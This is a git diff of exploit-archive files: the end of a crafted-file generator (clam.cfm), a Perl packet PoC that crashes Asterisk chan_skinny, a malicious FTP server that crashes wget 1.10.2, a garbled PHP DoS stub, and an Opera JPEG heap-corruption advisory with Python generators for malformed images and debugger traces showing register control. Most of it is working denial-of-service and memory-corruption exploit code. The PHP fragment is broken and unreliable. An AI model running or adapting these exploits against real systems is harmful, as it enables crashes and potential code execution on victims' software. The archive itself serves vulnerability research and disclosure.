+"\xBA\xDD\x38\xB7\x07\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x36\x2E\x67\x69\x66\x01". +"\xBB\x94\x3F\xAF\x06\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x37\x2E\x67\x69\x66\x01". +"\xBB\xC3\x45\x8E\x33\x12\x2F\x69\x6D\x67\x2F\x73\x6F\x6C\x77\x69\x73\x65\x20\x38\x2E\x67\x69\x66\x01". +"\xBB\xD1\x78\xE9\x73\x13\x2F\x69\x6D\x67\x2F\x53\x74\x61\x74\x75\x73\x5F\x42\x61\x72\x2E\x6A\x70\x67". +"\x01\x95\xBC\x76\xBC\x23\x0D\x2F\x69\x6D\x67\x2F\x74\x61\x62\x73\x2E\x67\x69\x66\x01\x9F\xFB\x3C\xA0". +"\x00\x0F\x2F\x69\x6D\x67\x2F\x75\x70\x6E\x70\x6F\x6E\x2E\x67\x69\x66\x01\x9C\x88\x6F\xCD\x51\x18\x2F". +"\x69\x6D\x67\x2F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x5F\x6C\x6F\x67\x69\x6E\x2E\x6A\x70\x67\x01\xC2". +"\x97\x37\xCB\x6F\x1A\x2F\x69\x6D\x67\x2F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x5F\x6F\x70\x74\x69\x6F". +"\x6E\x73\x2E\x6A\x70\x67\x01\xC2\xE3\x26\x81\x89\x42\x13\x2F\x69\x6D\x67\x2F\x78\x70\x66\x69\x72\x65". +"\x77\x61\x6C\x6C\x2E\x67\x69\x66\x01\x9C\xD6\x40\xB4\x69\x0A\x2F\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D". +"\x01\x8E\xE3\x4D\x8E\x77\x0D\x2F\x69\x70\x66\x69\x6C\x74\x65\x72\x2E\x68\x74\x6D\x01\x8E\xF2\x44\x9B". +"\x63\x08\x2F\x69\x72\x63\x2E\x68\x74\x6D\x01\x84\xB5\x43\x91\x2A\x09\x2F\x6C\x61\x6E\x67\x2E\x68\x74". +"\x6D\x01\x84\xC6\x6D\xA0\x4B\x0C\x2F\x6C\x69\x6E\x6B\x73\x79\x73\x2E\x68\x74\x6D\x01\x84\xE7\x38\x81". +"\x9A\x2F\x0A\x2F\x6C\x69\x73\x74\x73\x2E\x68\x74\x6D\x01\x8F\xE9\x4D\x8F\x33\x0B\x2F\x6C\x75\x63\x65". +"\x6E\x74\x2E\x68\x74\x6D\x01\x86\x81\x67\x9C\x5D\x0A\x2F\x70\x6F\x72\x74\x73\x2E\x68\x74\x6D\x01\x86". +"\x9E\x44\xE0\x3D\x14\x2F\x70\x72\x65\x66\x5F\x63\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x2E\x68\x74\x6D". +"\x01\x86\xFF\x01\xC7\x4E\x0D\x2F\x70\x72\x65\x66\x5F\x64\x69\x72\x2E\x68\x74\x6D\x01\x87\xC6\x4F\xA5". +"\x05\x11\x2F\x70\x72\x65\x66\x5F\x64\x69\x73\x70\x6C\x61\x79\x2E\x68\x74\x6D\x01\x8F\xF9\x00\x9D\x4C". +"\x12\x2F\x70\x72\x65\x66\x5F\x65\x78\x74\x65\x6E\x64\x65\x64\x2E\x68\x74\x6D\x01\x87\xEB\x54\xB9\x40". 
+"\x0F\x2F\x70\x72\x65\x66\x5F\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x88\xA5\x14\xBD\x59\x11\x2F\x70". +"\x72\x65\x66\x5F\x67\x65\x6E\x65\x72\x61\x6C\x2E\x68\x74\x6D\x01\x88\xE2\x6D\xBA\x3D\x0D\x2F\x70\x72". +"\x65\x66\x5F\x69\x72\x63\x2E\x68\x74\x6D\x01\x89\x9D\x2A\x96\x63\x0F\x2F\x70\x72\x65\x66\x5F\x6E\x6F". +"\x74\x65\x73\x2E\x68\x74\x6D\x01\x89\xB4\x0D\x97\x55\x11\x2F\x70\x72\x65\x66\x5F\x70\x72\x65\x66\x69". +"\x6E\x69\x2E\x68\x74\x6D\x01\x91\xA8\x7E\x97\x18\x0F\x2F\x70\x72\x65\x66\x5F\x70\x72\x6F\x78\x79\x2E". +"\x68\x74\x6D\x01\x91\xC0\x16\xB2\x26\x13\x2F\x70\x72\x65\x66\x5F\x73\x63\x68\x65\x64\x75\x6C\x65\x72". +"\x2E\x68\x74\x6D\x01\x91\xF2\x3C\xB5\x69\x12\x2F\x70\x72\x65\x66\x5F\x73\x65\x63\x75\x72\x69\x74\x79". +"\x2E\x68\x74\x6D\x01\x8F\x8E\x27\xA8\x7B\x10\x2F\x70\x72\x65\x66\x5F\x73\x65\x72\x76\x65\x72\x2E\x68". +"\x74\x6D\x01\x89\xCB\x62\xAC\x1C\x0F\x2F\x70\x72\x65\x66\x5F\x73\x74\x61\x74\x73\x2E\x68\x74\x6D\x01". +"\x89\xF7\x7E\x9A\x4E\x13\x2F\x70\x72\x65\x66\x5F\x77\x65\x62\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D". +"\x01\x90\x96\x4C\xA5\x52\x0C\x2F\x70\x72\x65\x76\x69\x65\x77\x2E\x68\x74\x6D\x01\x8A\x92\x4C\x95\x3C". +"\x0D\x2F\x70\x72\x6F\x67\x72\x65\x73\x73\x2E\x68\x74\x6D\x01\x8A\xA8\x08\xAC\x40\x0E\x2F\x71\x75\x65". +"\x75\x65\x72\x61\x6E\x6B\x2E\x68\x74\x6D\x01\x8A\xD4\x48\x89\x19\x0B\x2F\x72\x61\x74\x69\x6E\x67\x2E". +"\x68\x74\x6D\x01\x8A\xDD\x61\xAB\x3E\x0C\x2F\x72\x6F\x75\x74\x65\x72\x73\x2E\x68\x74\x6D\x01\x8B\x89". +"\x1F\x9A\x1E\x0C\x2F\x73\x65\x63\x68\x61\x73\x68\x2E\x68\x74\x6D\x01\x92\xF0\x24\xA8\x7D\x0E\x2F\x73". +"\x69\x67\x6E\x61\x74\x75\x72\x65\x2E\x68\x74\x6D\x01\x8B\xA3\x3D\x8E\x5D\x0F\x2F\x53\x4D\x43\x37\x30". +"\x30\x34\x41\x42\x52\x2E\x68\x74\x6D\x01\x8B\xB2\x1A\x82\x83\x32\x0C\x2F\x73\x6F\x6C\x77\x69\x73\x65". +"\x2E\x68\x74\x6D\x01\x8D\xB5\x4C\xA2\x09\x0B\x2F\x73\x6F\x75\x72\x63\x65\x2E\x68\x74\x6D\x01\x8D\xD7". +"\x55\x95\x28\x0A\x2F\x73\x74\x61\x72\x74\x2E\x68\x74\x6D\x01\x8D\xEC\x7D\xAF\x0C\x16\x2F\x54\x61\x62". 
+"\x6C\x65\x20\x6F\x66\x20\x43\x6F\x6E\x74\x65\x6E\x74\x73\x2E\x68\x68\x63\x01\x93\x99\x21\xC8\x6D\x0A". +"\x2F\x74\x6F\x6F\x6C\x73\x2E\x68\x74\x6D\x01\x8E\x9C\x09\xA5\x6D\x14\x2F\x74\x72\x6F\x75\x62\x6C\x65". +"\x73\x68\x6F\x6F\x74\x69\x6E\x67\x2E\x68\x74\x6D\x01\x92\xA8\x25\xC7\x7F\x12\x2F\x75\x70\x64\x61\x74". +"\x65\x5F\x73\x65\x72\x76\x65\x72\x2E\x68\x74\x6D\x01\x8E\xC1\x76\xA1\x57\x0F\x2F\x75\x73\x65\x64\x5F". +"\x66\x69\x6C\x65\x73\x2E\x68\x74\x6D\x01\x90\xD2\x57\xD6\x27\x0E\x2F\x77\x65\x62\x73\x65\x72\x76\x65". +"\x72\x2E\x68\x74\x6D\x01\x90\xBC\x1E\x96\x39\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x3A\x0F\xD6\x0E\x72\x0E\x06\x0E\x8E\x0D\x1D\x0D\xB3\x0C\x5B\x0C\xD9\x0B\x60\x0B\xDD\x0A". +"\x48\x0A\xC8\x09\x4B\x09\xAD\x08\x1E\x08\x88\x07\x04\x07\x80\x06\xFF\x05\x7E\x05\xE2\x04\x4D\x04\xD1". +"\x03\x59\x03\xCE\x02\x45\x02\x98\x01\x47\x01\xE8\x00\x8D\x00\xD7\x00\x07\x00\x50\x4D\x47\x49\xDF\x0F". +"\x00\x00\x01\x2F\x00\x14\x3A\x3A\x44\x61\x74\x61\x53\x70\x61\x63\x65\x2F\x4E\x61\x6D\x65\x4C\x69\x73". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; + +open FILE, ">clam.cfm" or die; +binmode(FILE); +print FILE $clam; +close FILE; + +# milw0rm.com [2006-10-17] diff --git a/platforms/multiple/dos/2597.pl b/platforms/multiple/dos/2597.pl index 86c5536e9..f1910bc0b 100755 --- a/platforms/multiple/dos/2597.pl +++ b/platforms/multiple/dos/2597.pl 
@@ -1,30 +1,30 @@
-#!/usr/bin/perl
-# Beyond Security
-# Copyright Noam Rathaus
-
-#
-# The following proof of concept causes the chan_skippy to crash in different locations and due to
-# memory corruption as well as double free calls, this is based on the finding of
-# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
-#
-
-use IO::Socket;
-use strict;
-
-my $target = "127.0.0.1";
-
-my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");
-
-unless ($remote) { die "cannot connect to skinny daemon on $target" }
-
-my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
-my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
-my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
-my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
-#[Switching to Thread -1494127696 (LWP 9909)]
-#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
-#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);
-
-print $remote $packet;
-
-# milw0rm.com [2006-10-19]
+#!/usr/bin/perl
+# Beyond Security
+# Copyright Noam Rathaus
+
+#
+# The following proof of concept causes the chan_skippy to crash in different locations and due to
+# memory corruption as well as double free calls, this is based on the finding of
+# Security-Assessment.com, and proves that the vulnerability is indeed exploitable and there...
+#
+
+use IO::Socket;
+use strict;
+
+my $target = "127.0.0.1";
+
+my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target, PeerPort => "2000");
+
+unless ($remote) { die "cannot connect to skinny daemon on $target" }
+
+my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory corruption: 0x08175830 ***
+my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc detected *** double free or corruption (!prev): 0x08184348 ***
+my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double free or corruption (out): 0x08171740 ***
+my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal SIGSEGV, Segmentation fault.
+#[Switching to Thread -1494127696 (LWP 9909)]
+#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
+#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);
+
+print $remote $packet;
+
+# milw0rm.com [2006-10-19]
diff --git a/platforms/multiple/dos/2857.php b/platforms/multiple/dos/2857.php
index 4bce3c3ea..3a4d229ad 100755
--- a/platforms/multiple/dos/2857.php
+++ b/platforms/multiple/dos/2857.php
@@ -1,27 +1,27 @@
- - -> 6) + 192) . chr(($x & 63) + 128); - } -?> - -# milw0rm.com [2006-11-27] + + +> 6) + 192) . chr(($x & 63) + 128); + } +?> + +# milw0rm.com [2006-11-27]
diff --git a/platforms/multiple/dos/2947.pl b/platforms/multiple/dos/2947.pl
index 5f174dfd5..fcf18346b 100755
--- a/platforms/multiple/dos/2947.pl
+++ b/platforms/multiple/dos/2947.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl
-################################################################################
-# wget <= 1.10.2 | Unchecked Boundary Condition
-# Federico L. Bossi Bonin
-#
-# www.globalst.com.ar
-# fbossi[at]globalst.com.ar
-################################################################################
-
-use strict;
-use IO::Socket;
-
-
-#Resolving localhost... 127.0.0.1
-#Connecting to localhost|127.0.0.1|:21... connected.
-#Logging in as anonymous ... Logged in!
-#==> SYST ...
-#Program received signal SIGSEGV, Segmentation fault.
-#[Switching to Thread -1211496768 (LWP 22824)]
-#0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6
-#(gdb) backtrace
-#0 0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6
-#1 0x080542c5 in ftp_syst (csock=6, server_type=0xbfe3d854) at ftp-basic.c:1042
-#2 0x0804fa6f in getftp (u=0x80800a0, len=0xbfe3d5d8, restval=0, con=0xbfe3d840) at ftp.c:367
-#3 0x08051211 in ftp_loop_internal (u=0x80800a0, f=0x0, con=0xbfe3d840) at ftp.c:1197
-#4 0x08051877 in ftp_get_listing (u=0x80800a0, con=0xbfe3d840, f=0xbfe3d7a8) at ftp.c:1341
-#5 0x08051a83 in ftp_retrieve_glob (u=0x80800a0, con=0xbfe3d840, action=2) at ftp.c:1705
-#6 0x08052910 in ftp_loop (u=0x80800a0, dt=0xbfe3d978, proxy=0x0) at ftp.c:1875
-#7 0x08066cf8 in retrieve_url (origurl=0x8080070 "ftp://localhost", file=0xbfe3d970, newloc=0xbfe3d974, refurl=0x0,dt=0xbfe3d978) at retr.c:678
-#8 0x08061bdc in main (argc=3, argv=0xbfe3da84) at main.c:943
-#(gdb)
-
-my $PORT=21;
-$SIG{CHLD} = 'IGNORE';
-
-
-my $listen = IO::Socket::INET->new(LocalPort => $PORT, Listen => 10,Proto => 'tcp',Reuse => 1);
-die "Cant't bind port: $@" unless $listen;
-
-print "wget PoC\nWainting conections\n";
-
-while (my $connection = $listen->accept){
-my $child;
-
- while (my $connection = $listen->accept){
- my $child;
- die "Can't fork: $!"
unless defined ($child = fork());
- if ($child == 0){
- $listen->close;
- while() {
- print $connection "220 \n";
- }
- exit 0;
- }
- else {
- print "Connecton recieved ... ",$connection->peerhost,"\n";
- $connection->close();
- }
- } #while
-
-} #while
-
-# milw0rm.com [2006-12-18]
+#!/usr/bin/perl
+################################################################################
+# wget <= 1.10.2 | Unchecked Boundary Condition
+# Federico L. Bossi Bonin
+#
+# www.globalst.com.ar
+# fbossi[at]globalst.com.ar
+################################################################################
+
+use strict;
+use IO::Socket;
+
+
+#Resolving localhost... 127.0.0.1
+#Connecting to localhost|127.0.0.1|:21... connected.
+#Logging in as anonymous ... Logged in!
+#==> SYST ...
+#Program received signal SIGSEGV, Segmentation fault.
+#[Switching to Thread -1211496768 (LWP 22824)]
+#0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6
+#(gdb) backtrace
+#0 0xb7d1c633 in strcasecmp () from /lib/tls/libc.so.6
+#1 0x080542c5 in ftp_syst (csock=6, server_type=0xbfe3d854) at ftp-basic.c:1042
+#2 0x0804fa6f in getftp (u=0x80800a0, len=0xbfe3d5d8, restval=0, con=0xbfe3d840) at ftp.c:367
+#3 0x08051211 in ftp_loop_internal (u=0x80800a0, f=0x0, con=0xbfe3d840) at ftp.c:1197
+#4 0x08051877 in ftp_get_listing (u=0x80800a0, con=0xbfe3d840, f=0xbfe3d7a8) at ftp.c:1341
+#5 0x08051a83 in ftp_retrieve_glob (u=0x80800a0, con=0xbfe3d840, action=2) at ftp.c:1705
+#6 0x08052910 in ftp_loop (u=0x80800a0, dt=0xbfe3d978, proxy=0x0) at ftp.c:1875
+#7 0x08066cf8 in retrieve_url (origurl=0x8080070 "ftp://localhost", file=0xbfe3d970, newloc=0xbfe3d974, refurl=0x0,dt=0xbfe3d978) at retr.c:678
+#8 0x08061bdc in main (argc=3, argv=0xbfe3da84) at main.c:943
+#(gdb)
+
+my $PORT=21;
+$SIG{CHLD} = 'IGNORE';
+
+
+my $listen = IO::Socket::INET->new(LocalPort => $PORT, Listen => 10,Proto => 'tcp',Reuse => 1);
+die "Cant't bind port: $@" unless $listen;
+
+print "wget PoC\nWainting conections\n";
+
+while (my
$connection = $listen->accept){
+my $child;
+
+ while (my $connection = $listen->accept){
+ my $child;
+ die "Can't fork: $!" unless defined ($child = fork());
+ if ($child == 0){
+ $listen->close;
+ while() {
+ print $connection "220 \n";
+ }
+ exit 0;
+ }
+ else {
+ print "Connecton recieved ... ",$connection->peerhost,"\n";
+ $connection->close();
+ }
+ } #while
+
+} #while
+
+# milw0rm.com [2006-12-18]
diff --git a/platforms/multiple/dos/3101.py b/platforms/multiple/dos/3101.py
index c339deddf..fd024e7fd 100755
--- a/platforms/multiple/dos/3101.py
+++ b/platforms/multiple/dos/3101.py
@@ -1,559 +1,559 @@ -Opera JPEG processing - Heap corruption vulnerabilities -======================================================= -Date..: 8th September 2006 - 31th October 2006 (update) - 3rd November 2006 (update) - 5th January 2007 (public release) - -http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=457 - -Author: posidron - -Application: Opera 9.01 Build 8552 -Environment: Windows XP Professional, Service Pack 2 - DE - - -Preamble -======== - -Opera is vulnerable in parsing the JPEG file format. Discovered were four -vulnerabilities, each in different segments of the file format. I will -describe in this advisory the two important ones. - -1 - ntdll.RtlAllocateHeap() DHT vulnerability -2 - ntdll.RtlAllocateHeap() SOS vulnerability - -Opera Mini for mobile phones could be vulnerable also. The second bug looks -very interesting to this topic. - - -Details -======= - -The following code produces the sample image on which all further operations -are made. It's a valid image which was generated with Adobe Photoshop. 
- -Properties ----------- - - Type : JPEG - Size : 1px x 1px - Compression: Low - Colors: : None - Filesize : 304 bytes - - -# File: sample.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 
0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python sample.py -sample.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - - ************************************************** - - -Details - ntdll.RtlAllocateHeap() DHT vulnerability ---------------------------------------------------- - -Segment: Define Huffman Table (DHT) - -DHT..................: FF C4 -Length...............: 00 4B -Index................: 00 -Number of codes......: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 -Sum of previous bytes: 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - -We change the above to the below: - -Number of codes......: 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -Sum of previous bytes: 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 - - -# File: heap.py -bytes = [ - 0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02, - 0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75, - 0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, - 0xFF, 0xEE, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00, - 0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12, - 0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26, - 0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41, - 0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C, - 0x20, 0x26, 0x18, 
0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B, - 0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, - 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00, - 0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01, - - 0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - - 0xFF, - 0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00, - 0xB3, 0x00, 0x1F, 0xFF, 0xD9 ] - -f = open(__file__+".jpg", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print __file__+".jpg created! (%d bytes)" % len(bytes) -# eof - -F:\vulndev\Opera> python heap.py -heap.py.jpg created! (304 bytes) -F:\vulndev\Opera> - - - -Analyse - ntdll.RtlAllocateHeap() DHT vulnerability ---------------------------------------------------- - -The call stack is very large, I think here is a good place to start: - -74E5D637 call dword ptr ds:[eax+4] ; set hardware bp on execution - -it's the 6th function from the top of the "crash" call stack. Restart Olly, -press F9 until Opera shows up again. - -Hit F7 until: - -74E610B6 mov bl, byte ptr ds:[eax+1] ; set hardware bp on execution - -Hit F9 until the following shows up in the panel, at this statement: - -ds:[543502E9]=C4 ('Ä') -bl=00 - -That's the marker of the "Define Huffman Table" segment. 
-Go on with F9, you will reach again: - -call dword ptr ds:[eax+4] - -Hit again F9, Opera shows up, drag the image into Opera. -You will reach again: - -call dword ptr ds:[eax+4] - -Hit F9 until you reached: - -74E610B6 mov bl, byte ptr ds:[eax+1] - -Hit F9 until the following shows up in the panel, at this statement: - -ds:[543502E9]=C4 ('Ä') -bl=00 - -Hit F7 to continue. - -74E5D735 push ebp -74E5D736 mov ebp, esp -... -74E5D750 mov dh, byte ptr ds:[eax+2] ; user input -74E5D753 mov dl, byte ptr ds:[eax+3] ; user input -74E5D756 lea edi, dword ptr ds:[edx+2] -74E5D759 cmp ecx, edi -74E5D75B jnb short Opera_1.74E5D765 - -First bytes of this marker are readed in there. - -Go on.. - -74E5D7C2 mov dl, byte ptr ds:[eax+ecx] ; read eax + n -74E5D7C5 mov byte ptr ss:[ebp+ecx-40], dl ; new location -74E5D7C9 movzx edx, dl -74E5D7CC add ebx, edx -74E5D7CE inc ecx ; n+=1 -74E5D7CF cmp ecx, 10 ; until n > 16 -74E5D7D2 jb short Opera_1.74E5D7C2 -74E5D7D4 lea eax, dword ptr ds:[ebx+1] -74E5D7D7 mov dword ptr ss:[ebp-18], ebx -74E5D7DA push eax -74E5D7DB call Opera_1.751E8B75 ; Opera allocation function - -Several operations are made here, single stepping might be interesting, -to follow the read-in process. - -74E5D7E0 mov edi, eax -74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] -74E5D7E5 push eax -74E5D7E6 mov dword ptr ss:[ebp-1C], edi -74E5D7E0 mov edi, eax -74E5D7E2 lea eax, dword ptr ds:[ebx+ebx] -74E5D7E5 push eax -74E5D7E6 mov dword ptr ss:[ebp-1C], edi -74E5D7E9 call Opera_1.751E8B75 ; Opera allocation function - -If you return here, the last procedures are made. 
- -74E5D8A7 mov eax, dword ptr ss:[ebp-18] -74E5D8AA add eax, 260 ; new allocation size -74E5D8AF push eax -74E5D8B0 call Opera_1.751E8B75 ; Opera allocation function - - 76709E57 push esi ; Size - 76709E58 push 0 ; Flags - 76709E5A push dword ptr ds:[768268C0] ; Handle - 76709E60 call dword ptr ds:[7671C1C0] ; ntdll.RtlAllocateHeap - - 6BB01414 lea edx, dword ptr ds:[esi+8] ; our "string" - 6BB01417 mov dword ptr ss:[ebp-10C], edx - 6BB0141D mov eax, dword ptr ds:[edx] - 6BB0141F mov dword ptr ss:[ebp-16C], eax - 6BB01425 mov ecx, dword ptr ds:[edx+4] - 6BB01428 mov dword ptr ss:[ebp-114], ecx - 6BB0142E mov edi, dword ptr ds:[ecx] ; ds:[41414141]=??? - - -Access violation when reading [41414141] - -EAX 41414141 -ECX 41414141 -EDX 5C9C9348 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -EBX 59110000 -ESP 578DEB6C -EBP 578DED8C -ESI 5C9C9340 -EDI 0000004F -EIP 3D3D142E ntdll.3D3D142E - -At this point we are able to control 4 bytes of EAX and ECX with two bytes, -defined in the JPEG file. -Somebody with a better understanding of the "Define Huffman Table" segment -can probably do more. There are several other issues in parsing this segment. -These routines are very nested and big, it would be a very time-consuming -research. - - - ************************************************** - - -Details - ntdll.RtlAllocateHeap() SOS vulnerability ---------------------------------------------------- - -The arrows mark the components whose datatypes are not properly validated by -Opera. This can lead to unexpected vulnerabilities depending on the function -flow. - -Segment: Start Of Scan (SOS) - -SOS: FF DA -Length: 00 0C -Components: 03 -Data of component: - - component number: 01 - - 4Bit DC table, 4Bit AC table: 00 - - - component number: 02 - - 4Bit DC table, 4Bit AC table: 11 - - - component number: 03 - - 4Bit DC table, 4Bit AC table: 11 - -In the next example we set the value of "Components" to 01, we also overwrite -the end of file with dump bytes. 
